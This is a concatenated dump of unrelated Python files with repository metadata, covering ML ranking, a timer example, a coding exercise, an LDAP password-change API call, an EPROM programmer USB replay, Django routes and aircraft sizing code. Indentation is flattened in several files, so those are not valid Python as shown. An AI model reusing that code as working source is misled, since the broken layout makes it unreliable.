0439f06409ab6778d84756e8fa98bb4cb7bd9058 | cb20ef5b4048457a2e6dca4a4cb45c53c9843744 | /test/rosapi/1.0/actions/data.logrotate.py | c1b93af96b263f644f14def92db35a78ef176b57 | [] | no_license | rudecs/openvcloud | 5001b77e8d943427c1bed563f3dcc6b9467936e2 | 12ccce2a54034f5bf5842e000c2cc3d7e22836d8 | refs/heads/master | 2020-03-24T00:00:10.422677 | 2018-11-22T13:41:17 | 2018-11-22T13:41:17 | 142,267,808 | 2 | 1 | null | 2018-07-25T08:02:37 | 2018-07-25T08:02:36 | null | UTF-8 | Python | false | false | 54 | py | def main(j,jp):
    # TODO: remove old logs (not implemented yet)
pass
| [
"devnull@localhost"
] | devnull@localhost |
20ea0483a27f1041660bd88552c58835f78d876e | b08d42933ac06045905d7c005ca9c114ed3aecc0 | /src/coefSubset/evaluate/ranks/tenPercent/rank_1bj1_H.py | 1bc2f459e6bf336ab3b52b79623a3fec22f210a6 | [] | no_license | TanemuraKiyoto/PPI-native-detection-via-LR | d148d53f5eb60a4dda5318b371a3048e3f662725 | 897e7188b0da94e87126a4acc0c9a6ff44a64574 | refs/heads/master | 2022-12-05T11:59:01.014309 | 2020-08-10T00:41:17 | 2020-08-10T00:41:17 | 225,272,083 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,386 | py | # 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script.
# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue.
import os
import pandas as pd
import numpy as np
import pickle
os.chdir('/mnt/scratch/tanemur1/')
# Read the model and trainFile
testFile = '1bj1.csv'
identifier = 'H'
coefFrac = 0.1
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/tenPercent/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/tenPercent/ranks/'
pdbID = testFile[:4]
with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
clf = pickle.load(f)
result = pd.DataFrame()
scoreList = []
df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
#df1 = df1.reindex(sorted(df1.columns), axis = 1)
# Keep coefficients within the given fraction when ordered by decreasing order of coefficient magnitude
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs['absVal'] = np.abs(coefs['coefficients'])
coefs.sort_values(by = 'absVal', ascending = False, inplace = True)
coefs = coefs[:int(14028 * coefFrac + 0.5)]
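# 14028 appears to be the total coefficient count, so coefFrac = 0.1 keeps
# roughly the top ten percent of descriptors by absolute coefficient.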
keepList = list(coefs.index)
del coefs
df1 = df1[keepList]
df1 = df1.reindex(sorted(df1.columns), axis = 1)
with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
scaler = pickle.load(g)
for i in range(len(df1)):
    # Subtract every row of the dataframe from row i, then drop the trivial (row i - row i) entry. Some input files also have a 'class' column; this is erroneous and is removed.
df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
    # Standardize input DF using the standard scaler fit on the training data.
df2 = scaler.transform(df2)
# Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex
predictions = clf.predict(df2)
score = sum(predictions)
scoreList.append(score)
# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)
with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
result.to_csv(h)
| [
"[email protected]"
] | |
444d45bf3c5ac155b55dfd08b8250911a948e0c8 | a550aece79bda789826b463280b91abffbf2d372 | /books/python-3-oop-packt/Chapter7/7_28_callable_repeat.py | 09746de64e095feb18df107627ebdb96c1fe1546 | [
"MIT"
] | permissive | phiratio/learn_python | 20376470eaa292c157fd01f52b3077e3a983cd5a | a32240d4355fb331805d515f96e1d009914e5c47 | refs/heads/master | 2022-11-27T07:07:45.712373 | 2020-12-03T22:04:31 | 2020-12-03T22:04:31 | 189,397,679 | 1 | 0 | MIT | 2022-11-22T04:40:27 | 2019-05-30T10:56:10 | Python | UTF-8 | Python | false | false | 469 | py | from timer import Timer
import datetime
def format_time(message, *args):
now = datetime.datetime.now().strftime("%I:%M:%S")
print(message.format(*args, now=now))
class Repeater:
def __init__(self):
self.count = 0
def __call__(self, timer):
format_time("{now}: repeat {0}", self.count)
self.count += 1
timer.call_after(5, self)
timer = Timer()
timer.call_after(5, Repeater())
format_time("{now}: Starting")
timer.run()
| [
"[email protected]"
] | |
088099fe03d5e3dee4df77f61ea5cb2aa08d45d5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /M8hDPzNZdie8aBMcb_11.py | f8aa226b0f1d8e00377c89c45f1f158d226792c3 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | """
Implement a function count_substring that counts the number of substrings that
begin with the character "A" and end with the character "X".
For example, given the input string `"CAXAAYXZA"`, there are four substrings
that begin with "A" and end with "X", namely: "AX", "AXAAYX", "AAYX", and
"AYX".
### Examples
count_substring("CAXAAYXZA") ➞ 4
count_substring("AAXOXXA") ➞ 6
count_substring("AXAXAXAXAX") ➞ 15
### Notes
* You should aim to avoid using nested loops to complete the task.
* You can assume that the input string is composed of English upper case letters only.
"""
def count_substring(txt: str) -> int:
return sum(txt[i:].count('X') for i,v in enumerate(txt[:-1]) if v == 'A')
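# An equivalent single-pass variant (illustrative sketch, not part of the
# original solution): every 'X' closes one substring for each 'A' seen so far,
# avoiding the repeated suffix scans of txt[i:].count('X').
def count_substring_linear(txt: str) -> int:
    total = a_seen = 0
    for ch in txt:
        if ch == 'A':
            a_seen += 1
        elif ch == 'X':
            total += a_seen
    return total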
| [
"[email protected]"
] | |
5458665911175eba625d5f5b7fc0cc7853562425 | 9d82e37d34ed4d836fcef98ed37ed7ac5c49b316 | /ibmsecurity/isam/web/embedded_ldap/admin.py | a068695630ebb77e72b212d90faed1a94943d4d2 | [
"Apache-2.0"
] | permissive | keiran-ibm/ibmsecurity | 075c156961e371c0e85a7c360fb2d82954315bb6 | b1a77f7a1e8c3cce67e2c3af85c20626d42c0bbd | refs/heads/master | 2022-02-14T14:24:15.687461 | 2019-01-18T05:21:19 | 2019-01-18T05:21:19 | 116,325,033 | 0 | 0 | Apache-2.0 | 2019-01-18T05:16:46 | 2018-01-05T01:23:35 | Python | UTF-8 | Python | false | false | 643 | py | import logging
logger = logging.getLogger(__name__)
def set_pw(isamAppliance, password, check_mode=False, force=False):
"""
Changing the administrator password of the embedded LDAP server
"""
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Changing the administrator password of the embedded LDAP server",
"/isam/embedded_ldap/change_pwd/v1",
{
"password": password
})
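# Example (hypothetical `appliance` object):
#   set_pw(appliance, 'new-password')
# posts to /isam/embedded_ldap/change_pwd/v1, or returns a changed=True stub
# when check_mode is set.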
| [
"[email protected]"
] | |
be65e8b6843e01ce485befc48c2d14bde2967dea | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/contradiction/medical_claims/alamri/tfrecord_gen.py | 5ddfa13b77c7f7eda2cea802707861ff4e6e6373 | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 3,932 | py | import json
import os
from typing import Iterator
from contradiction.medical_claims.alamri.pairwise_gen import enum_true_instance, enum_neg_instance, enum_neg_instance2, \
enum_neg_instance_diff_review
from contradiction.medical_claims.biobert.voca_common import get_biobert_tokenizer
from cpath import at_output_dir, output_path
from data_generator.cls_sep_encoder import get_text_pair_encode_fn, PairedInstance
from data_generator.tokenizer_wo_tf import get_tokenizer
from misc_lib import DataIDManager, exist_or_mkdir
from tf_util.record_writer_wrap import write_records_w_encode_fn
Entailment = 0
Neutral = 1
Contradiction = 2
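# NLI-style label ids; every pair generated below is written with the Neutral label.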
def generate_true_pairs(data_id_man):
yield from generate_inner(data_id_man, enum_true_instance)
def generate_neg_pairs(data_id_man):
enum_fn = enum_neg_instance
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs2(data_id_man) -> Iterator[PairedInstance]:
enum_fn = enum_neg_instance2
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs_diff_review(data_id_man):
enum_fn = enum_neg_instance_diff_review
yield from generate_inner(data_id_man, enum_fn)
def generate_inner(data_id_man, enum_fn) -> Iterator[PairedInstance]:
for c1, c2, pair_type in enum_fn():
info = {
'text1': c1.text,
'text2': c2.text,
'pair_type': pair_type
}
inst = PairedInstance(c1.text, c2.text, data_id_man.assign(info), Neutral)
yield inst
def generate_and_write(file_name, generate_fn, tokenizer):
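    # Encode each pair into fixed-length (300 token) records, then dump the
    # data_id -> info mapping as a JSON sidecar next to the tfrecord file.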
data_id_man = DataIDManager()
inst_list = generate_fn(data_id_man)
max_seq_length = 300
save_path = at_output_dir("alamri_tfrecord", file_name)
encode_fn = get_text_pair_encode_fn(max_seq_length, tokenizer)
write_records_w_encode_fn(save_path, encode_fn, inst_list)
info_save_path = at_output_dir("alamri_tfrecord", file_name + ".info")
json.dump(data_id_man.id_to_info, open(info_save_path, "w"))
def bert_true_pairs():
tokenizer = get_tokenizer()
file_name = "bert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_true_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs2():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs2():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs_diff_review():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs_diff_review():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def main():
exist_or_mkdir(os.path.join(output_path, "alamri_tfrecord"))
bert_neg_pairs_diff_review()
biobert_neg_pairs_diff_review()
# bert_neg_pairs2()
# biobert_neg_pairs2()
# bert_true_pairs()
# bert_neg_pairs()
# biobert_true_pairs()
# biobert_neg_pairs()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
b324821f4e1cb588672bdca6d07e05ff834b9547 | a939ec03a7eb31962817d6cffea7f125ea4d69db | /DataScience/pandas/Example02_series.py | 9983ac491066a66c45841303c88fcc293db3bfb3 | [] | no_license | dipayandutta/python3 | e21e50d7a21315bc63702a103af79f3d61d91ab1 | f3d01ea52d05a23103cf86afbf5dff64a5d36634 | refs/heads/master | 2022-12-10T09:13:04.967400 | 2021-07-25T15:20:40 | 2021-07-25T15:20:40 | 153,072,927 | 0 | 0 | null | 2022-11-22T02:24:01 | 2018-10-15T07:46:28 | Python | UTF-8 | Python | false | false | 144 | py | #Manually assign index values to a series
import pandas as pd
series = pd.Series(['Dipayan','Ruby'],index=['Husband','spouse'])
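# print(series) renders each value under its custom label, roughly:
# Husband    Dipayan
# spouse        Ruby
# dtype: object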
print(series) | [
"[email protected]"
] | |
5f956a3f925ac4a9a724e8128b079d5b8afa2c82 | 45734abde30b437c2a1ba80653d7323e5c1d8c7f | /python/0320_generalized_abbreviation.py | f56e22143bc7bf3043f75dbf895dd29533b46079 | [] | no_license | rdtr/leetcode_solutions | 6629e03dd5b5fee15aaabe7f53204778f237ed96 | 51800d33c57e36ef62b6067d6f91a82c0e55dc6d | refs/heads/main | 2022-05-21T12:17:23.201832 | 2022-03-12T09:20:46 | 2022-03-12T09:20:46 | 80,395,988 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from collections import deque
from typing import List  # List is used in the annotations below
class Solution:
def generateAbbreviations(self, word: str) -> List[str]:
res = []
self.helper(word, 0, 0, '', res)
return res
def helper(self, word, pos, length, cur, res):
if pos >= len(word):
if length > 0:
cur += str(length)
res.append(cur)
return
if length == 0: # just consume one character
self.helper(word, pos + 1, 0, cur + word[pos], res)
else: # perform abbr
self.helper(word, pos + 1, 0, cur + str(length) + word[pos], res)
# skip this character and increment abbr length
self.helper(word, pos + 1, length + 1, cur, res)
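# For example, generateAbbreviations("word") produces all 2**4 = 16
# abbreviations, from "word" itself down to the fully collapsed "4".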
| [
"[email protected]"
] | |
0991be737f49582ec10aa7eedbd0a61d6dfe7b40 | 9b0bdebe81e558d3851609687e4ccd70ad026c7f | /剑指offer/02.从尾到头打印链表.py | c171768fb4cf4ebffccff7c7bf930ebb8b0066c0 | [] | no_license | lizenghui1121/DS_algorithms | 645cdad007ccbbfa82cc5ca9e3fc7f543644ab21 | 9690efcfe70663670691de02962fb534161bfc8d | refs/heads/master | 2022-12-13T22:45:23.108838 | 2020-09-07T13:40:17 | 2020-09-07T13:40:17 | 275,062,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | """
Given a linked list, return its node values from tail to head as a list (ArrayList).
@Author: Li Zenghui
@Date: 2020-03-02 20:10
"""
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    # Return the sequence of values from tail to head, e.g. [1, 2, 3]
def printListFromTailToHead(self, listNode):
res = []
p = listNode
while p:
res.insert(0, p.val)
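            # insert(0, ...) keeps res reversed as we walk (O(n^2) overall);
            # appending then reversing once at the end would be O(n).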
p = p.next
return res | [
"[email protected]"
] | |
b08c2c670bcb0c5c3ca004b5b5e8ae7656f10ffa | 369b985626c565096a3e65635542ac708339b329 | /blog/urls.py | 9a3cbcfd3770f5beceeffc016a5790b887880504 | [
"MIT"
] | permissive | ernestmucheru/Week4-IP | 9a68b28a127d8746d777d7b67e2cc055d034980c | be80372a33cbc3e80644915db66e0bf51cced175 | refs/heads/main | 2023-06-27T19:45:48.071039 | 2021-07-27T06:34:22 | 2021-07-27T06:34:22 | 389,307,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | from django.urls import path
# from .views import (PostListView,PostDetailView,PostCreateView,PostUpdateView,PostDeleteView)
from . import views
urlpatterns =[
# path('', PostListView.as_view(), name='blog'),
# path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
# path('post/new/', PostCreateView.as_view(), name='post-create'),
# path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
# path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
path('new-post', views.create_post, name='post'),
path('<hood_id>/new-post', views.create_post, name='post')
] | [
"[email protected]"
] | |
84df37df94ef3c4a86e883fc459662587a40e5c2 | 10686640b326da3de4e37b08bebd9f7ec7609ca7 | /uvscada/bpm/i87c51/write.py | 05a1a477faa0b38d6118941655ab56c87cb0f289 | [
"BSD-2-Clause"
] | permissive | jshafer817/uvscada | 62e11d136e03968878bcd647c896c32acae23c79 | 206a6c0cbf241b037de1fab47ce6f386d61b7982 | refs/heads/master | 2021-01-18T05:00:32.710552 | 2017-02-26T03:06:34 | 2017-02-26T03:06:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,066 | py | import binascii
import time
import usb1
import libusb1
import sys
import struct
import inspect
from uvscada.usb import usb_wraps
from uvscada.bpm.bp1410_fw import load_fx2
from uvscada.bpm import bp1410_fw_sn, startup
from uvscada.bpm.cmd import bulk2, bulk86
from uvscada.bpm.cmd import sm_read, gpio_readi, led_mask_30, cmd_49, cmd_02, cmd_50, cmd_57s, cmd_57_94, cmd_57_50
from uvscada.bpm.cmd import sm_info0, sm_info1, sm_insert, sn_read, sm_info22, sm_info24, sm_info10
from uvscada.util import str2hex, hexdump
from uvscada.usb import validate_read, validate_readv
import read
import read_fw
import write_fw
class NotBlank(Exception):
pass
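# Raised by replay() when the blank check fails; a caller can handle it, e.g.:
#   try:
#       replay(dev, fw)
#   except NotBlank:
#       print 'Erase the part before programming'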
def open_dev(usbcontext=None):
if usbcontext is None:
usbcontext = usb1.USBContext()
print 'Scanning for devices...'
for udev in usbcontext.getDeviceList(skip_on_error=True):
vid = udev.getVendorID()
pid = udev.getProductID()
if (vid, pid) == (0x14b9, 0x0001):
print
print
print 'Found device'
print 'Bus %03i Device %03i: ID %04x:%04x' % (
udev.getBusNumber(),
udev.getDeviceAddress(),
vid,
pid)
return udev.open()
raise Exception("Failed to find a device")
# sm scan for large values
# Exception: prefix: wanted 0x08, got 0x2C
'''
TODO: handle better
If you try to program something you can't
(ie a non-erased part)
you'll get
BadPrefix: Wanted prefix 0x18, got 0x08
with reply \x63\x01
'''
def fw_w(dev, fw, verbose=False):
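    # Stream the firmware image in bulk writes of at most 0xCC bytes; the
    # final chunk uses prefix 0x08 (expect reply 0x00), earlier chunks use
    # prefix 0x18 (expect reply 0x0B).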
pos = 0
print 'FW load: begin'
tstart = time.time()
while pos < len(fw):
remain = len(fw) - pos
chunk = fw[pos:pos + min(remain, 0xCC)]
if len(chunk) == remain:
prefix = 0x08
reply = "\x00"
else:
prefix = 0x18
reply = "\x0B"
if verbose:
print ' pos 0X%04X, len 0x%02X, prefix 0x%02X' % (pos, len(chunk), prefix)
buff = bulk2(dev,
chr(len(chunk)) + '\x00' + chunk,
target=0x01, prefix=prefix)
validate_read(reply, buff, "packet W: 429/430, R: 431/432")
pos += len(chunk)
tend = time.time()
print 'FW load : end. Took %0.1f sec' % (tend - tstart,)
'''
First one is a program cycle, others are simply
FW load: begin
FW load : end. Took 2.7 sec
FW load: begin
FW load : end. Took 0.1 sec
FW load: begin
FW load : end. Took 0.1 sec
'''
def replay(dev, fw, cont=True, blank=True):
bulkRead, bulkWrite, controlRead, controlWrite = usb_wraps(dev)
# Generated by uvusbreplay 0.1
# uvusbreplay copyright 2011 John McMaster <[email protected]>
# cmd: /home/mcmaster/bin/usbrply --packet-numbers --no-setup --comment --fx2 --packet-numbers -j cap/2015-10-11/i87c51_13_write_cont_id_blank_v2_ff.cap
# FIXME: size?
read.replay1(dev, cont)
# Generated from packet 363/364
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 367/368
cmd_50(dev, "\x18\x00")
# Generated from packet 369/370
buff = bulk2(dev,
"\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x8F\x00", buff, "packet W: 369/370, R: 371/372")
# Generated from packet 373/374
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x90\x00\xB0\x5D\x09\x00", buff, "packet W: 373/374, R: 375/376")
# Generated from packet 377/378
buff = bulk2(dev, "\x57\x8F\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 377/378, R: 379/380")
# Generated from packet 381/382
cmd_50(dev, "\x0A\x06")
# Generated from packet 383/384
buff = bulk2(dev, write_fw.p383, target=0x02)
validate_read("\x90\x00", buff, "packet W: 383/384, R: 385/386")
# Generated from packet 387/388
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x91\x00\xC0\x63\x09\x00", buff, "packet W: 387/388, R: 389/390")
# Generated from packet 391/392
if blank:
print 'Blank checking'
tstart = time.time()
buff = bulk2(dev, "\x08\x00\x57\x90\x00", target=0x02)
tend = time.time()
print 'Blank test took %0.3f sec' % (tend - tstart,)
if buff == "\x00\x00":
print 'Blank: pass'
elif buff == "\x01\x00":
raise NotBlank('Blank: fail')
else:
hexdump(buff)
raise Exception("Unknown blank status")
# Generated from packet 395/396
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 399/400
cmd_50(dev, "\x18\x00")
# Generated from packet 401/402
buff = bulk2(dev,
"\x66\xB8\x01\x32\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x91\x00", buff, "packet W: 401/402, R: 403/404")
# Generated from packet 405/406
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x92\x00\xE0\x63\x09\x00", buff, "packet W: 405/406, R: 407/408")
# Generated from packet 409/410
buff = bulk2(dev, "\x57\x91\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 409/410, R: 411/412")
# Generated from packet 413/414
cmd_50(dev, "\x9F\x09")
# Generated from packet 415/416
buff = bulk2(dev, write_fw.p415, target=0x02)
validate_read("\x92\x00", buff, "packet W: 415/416, R: 417/418")
# Generated from packet 419/420
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x93\x00\x80\x6D\x09\x00", buff, "packet W: 419/420, R: 421/422")
# Generated from packet 423/424
buff = bulk2(dev, "\x57\x92\x00", target=0x01)
validate_read("\x62", buff, "packet W: 423/424, R: 425/426")
# Generated from packet 427/428
# NOTE: prefix 0x18
buff = bulk86(dev, target=0x01, prefix=0x18)
validate_read("\x0B", buff, "packet 427/428")
# Generated from packet 429/430
fw_w(dev, fw, verbose=True)
# Generated from packet 513/514
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 517/518
cmd_50(dev, "\x18\x00")
# Generated from packet 519/520
buff = bulk2(dev,
"\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x93\x00", buff, "packet W: 519/520, R: 521/522")
# Generated from packet 523/524
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x94\x00\xA0\x6D\x09\x00", buff, "packet W: 523/524, R: 525/526")
# Generated from packet 527/528
buff = bulk2(dev, "\x57\x93\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 527/528, R: 529/530")
# Generated from packet 531/532
cmd_50(dev, "\xE0\x08")
# Generated from packet 533/534
buff = bulk2(dev, write_fw.p533, target=0x02)
validate_read("\x94\x00", buff, "packet W: 533/534, R: 535/536")
# Generated from packet 537/538
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x95\x00\x80\x76\x09\x00", buff, "packet W: 537/538, R: 539/540")
# Generated from packet 541/542
cmd_57_94(dev)
# Generated from packet 547/548
fw_w(dev, fw)
# Generated from packet 631/632
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 635/636
cmd_50(dev, "\x18\x00")
# Generated from packet 637/638
buff = bulk2(dev,
"\x66\xB8\x01\x37\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x95\x00", buff, "packet W: 637/638, R: 639/640")
# Generated from packet 641/642
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x96\x00\xA0\x76\x09\x00", buff, "packet W: 641/642, R: 643/644")
# Generated from packet 645/646
buff = bulk2(dev, "\x57\x95\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 645/646, R: 647/648")
# Generated from packet 649/650
cmd_57_94(dev)
# Generated from packet 655/656
fw_w(dev, fw)
# Generated from packet 739/740
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 743/744
cmd_50(dev, "\x0D\x00")
# Generated from packet 745/746
buff = bulk2(dev, "\x66\xB9\x00\x00\xB2\x00\xFB\xFF\x25\x44\x11\x00\x00", target=0x02)
validate_read("\x96\x00", buff, "packet W: 745/746, R: 747/748")
# Generated from packet 749/750
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x97\x00\xB0\x76\x09\x00", buff, "packet W: 749/750, R: 751/752")
# Generated from packet 753/754
cmd_57_50(dev, "\x96", "\x1A\x00")
# Generated from packet 755/756
buff = bulk2(dev,
"\x66\xB9\x00\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00\x66\xB9\x00" \
"\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x97\x00", buff, "packet W: 755/756, R: 757/758")
# Generated from packet 759/760
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x98\x00\xD0\x76\x09\x00", buff, "packet W: 759/760, R: 761/762")
# Generated from packet 763/764
buff = bulk2(dev, "\x57\x97\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 763/764, R: 765/766")
# Generated from packet 767/768
led_mask_30(dev, "pass")
# Generated from packet 771/772
gpio_readi(dev)
# Generated from packet 775/776
gpio_readi(dev)
# Generated from packet 779/780
sm_info22(dev)
# Generated from packet 783/784
sm_info24(dev)
# Generated from packet 787/788
sm_read(dev)
# Generated from packet 791/792
cmd_49(dev)
# Generated from packet 795/796
sm_read(dev)
# Generated from packet 799/800
sm_insert(dev)
# Generated from packet 803/804
sm_info10(dev)
| [
"[email protected]"
] | |
dcd1312cab4fb26d9d18de7f6ae7ba98ab807bcc | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712184959.py | 2722f9846c7b00deb679ab94edd3570b6ebdba30 | [] | no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,129 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
from scipy.optimize import curve_fit
"""
All units are SI (the International System of Units)
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
        :param n: number of motors
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
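
    # master_equation below implements the Mattingly power-based master equation,
    #   P/W_TO = (1-Hp)*beta*V/alpha * [ q*CD/(beta*W/S) + (1/V)*dh/dt + (1/g0)*dV/dt ]
    # with CD = K1*CL**2 + K2*CL + CD0 + CDR + dCD0 and CL = n*beta*(W/S)/q + dCL.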
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
